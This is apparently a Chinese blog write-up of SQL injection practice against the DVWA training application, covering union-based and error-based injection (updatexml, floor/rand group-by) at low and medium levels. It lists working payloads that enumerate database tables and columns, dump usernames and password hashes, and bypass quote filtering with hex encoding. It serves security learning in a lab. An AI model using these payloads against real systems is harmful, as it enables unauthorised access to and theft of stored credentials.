Dvwa sql low 联合注入,报错注入

Dvwa sql low 联合注入,报错注入

\1. 判断注入点

输入1,数据正常显示,输入1',页面显示爆错,1附近多出现了一个逗号

\2. 判断注入类型

?id=1' and 1=1 # 正常显示数据,

?id=1' and 1=2 # 页面不显示数据,也不会报错

判断 low级别的注入是字符型

\3. 判断字段数

? Id=1' order by 3 #

?id=1' order by 2 # 页面显示正常

\4. 找出注入点

Payload :

http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27+union+select+1%2C2%23&Submit=Submit#

\5. 爆出表名

Payload:

-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

\6. 爆出字段名

Payload:

-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'#

\7. 爆出敏感数据

Payload:

-1' union select 1,group_concat(user,password) from users#

Dvwa medium

\1. 判断注入点

抓到提交的包,上传到repeater

输入单引号,页面出现爆错,

\2. 判断注入类型

? Id=1 and 1=1 页面显示正常

? Id=1 and 1=2 页面无显示

判断是数字型

\3. 判断注入字段数

?id =1 order by 3 #

\4. 爆出库名

Payload: id=-1 union select database(),version()

\5. 爆出表名

Payload:

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

\6. 爆出列名

这里发现单引号出现过滤,我们尝试16进制编码来进行绕过

Payload:

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273

\7. 爆出数据

Payload:

id=-1 union select 1,group_concat(user,password)from users&Submit=Submit

Dvwa low medumn

\1. 判断注入点,

输入单引号,发现页面报错,可进行报错注入

Payload:

id=-1 and updatexml(1,concat(0x7e,database()),1)

\2. 爆出表名

Payload:

id=-1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)

\3. 爆出列名

Payload:

id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)),1)&Submit=Submit

发现只能爆出一些列名

尝试使用limit函数进行测试

Payload:

id=-1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 0,1)),1)

发现还是只能出现一点点数据,调整limit的数量还是只能一点点

Dvwa low

尝试使用floor函数和group by 进行报错

原理:通过 floor 报错的方法来爆数据的本质是 group by 语句的报错。group by 语句报错的原因

是 floor(random(0)*2)的不确定性,即可能为 0 也可能为 1

group by key 执行时循环读取数据的每一行,将结果保存于临时表中。读取每一行的 key 时,

如果 key 存在于临时表中,则更新临时表中的数据(更新数据时,不再计算 rand 值);如果

该 key 不存在于临时表中,则在临时表中插入 key 所在行的数据。(插入数据时,会再计算

rand 值)如果此时临时表只有 key 为 1 的行不存在 key 为 0 的行,那么数据库要将该条记录插入临

时表,由于是随机数,插时又要计算一下随机值,此时 floor(random(0)*2)结果可能为 1,就

会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值

实际测试中发现,出现报错,至少要求数据记录为 3 行,记录数超过 3 行一定会报错,2 行

时是不报错的。

Payload:

1' union select count(*),concat(floor(rand(0)*2),database())fannn from information_schema.tables group by fannn #

参考链接:SQL注入实战之报错注入篇(updatexml extractvalue floor) - 陈子硕 - 博客园 (cnblogs.com)

om information_schema.tables group by fannn #

[外链图片转存中...(img-WpMKvPvf-1710557932658)]

参考链接:SQL注入实战之报错注入篇(updatexml extractvalue floor) - 陈子硕 - 博客园 (cnblogs.com)

相关推荐
易云码5 小时前
信息安全建设方案,网络安全等保测评方案,等保技术解决方案,等保总体实施方案(Word原件)
数据库·物联网·安全·web安全·低代码
Spring_java_gg8 小时前
如何抵御 Linux 服务器黑客威胁和攻击
linux·服务器·网络·安全·web安全
独行soc8 小时前
#渗透测试#SRC漏洞挖掘#深入挖掘XSS漏洞02之测试流程
web安全·面试·渗透测试·xss·漏洞挖掘·1024程序员节
newxtc9 小时前
【国内中间件厂商排名及四大中间件对比分析】
安全·web安全·网络安全·中间件·行为验证·国产中间件
mingzhi611 天前
渗透测试-快速获取目标中存在的漏洞(小白版)
安全·web安全·面试·职场和发展
安胜ANSCEN1 天前
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
网络·安全·web安全·威胁检测·自动化响应
超栈2 天前
蓝桥杯-网络安全比赛题目-遗漏的压缩包
前端·网络·sql·安全·web安全·职场和发展·蓝桥杯
黑龙江亿林等级保护测评2 天前
DDOS防护介绍
网络·人工智能·安全·web安全·智能路由器·ddos